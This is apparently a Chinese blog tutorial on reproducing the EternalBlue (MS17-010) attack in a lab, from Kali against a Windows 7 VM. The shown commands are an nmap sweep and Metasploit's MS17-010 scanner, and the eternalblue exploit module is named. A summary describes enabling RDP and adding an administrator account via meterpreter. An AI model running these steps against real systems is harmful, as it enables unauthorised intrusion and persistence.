永恒之蓝漏洞(ms 17-010)利用,并建立远程连接
1.复现环境
攻击机: Kali 2021(IP192.168.67.153)
靶机:Windows 7 X64
虚拟机设置的网络适配器选择Nat模式,保持攻击机和靶机在同一网段。
2.目标扫描
使用nmap扫描同一网段存活主机,发现存活主机192.168.67.134。
nmap -sP 192.168.67.0/24

进入msf(metasploit framework),使用search ms17-010 查找可以用模块
search ms17-010

0是永恒之蓝攻击模块exploit/windows/smb/ms17_010_eternalblue
4是永恒之蓝探测模块auxiliary/scanner/smb/smb_ms17_010
使用4对目标机进行探测,查看目标机是否存在永恒之蓝漏洞
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.67.134
run

本文介绍了如何在Kali Linux环境下,针对Windows 7 X64系统利用永恒之蓝(ms17-010)漏洞进行攻击。通过nmap扫描发现目标主机,使用Metasploit Framework的探测和攻击模块确认并利用漏洞。成功后,通过meterpreter命令开启目标机的RDP服务,添加新用户并将其加入管理员组,实现远程桌面连接。
利用,并建立远程连接&spm=1001.2101.3001.5002&articleId=117627730&d=1&t=3&u=d15d0ec5db054cd7abc62f32b38cbd59)
543

被折叠的 条评论
为什么被折叠?



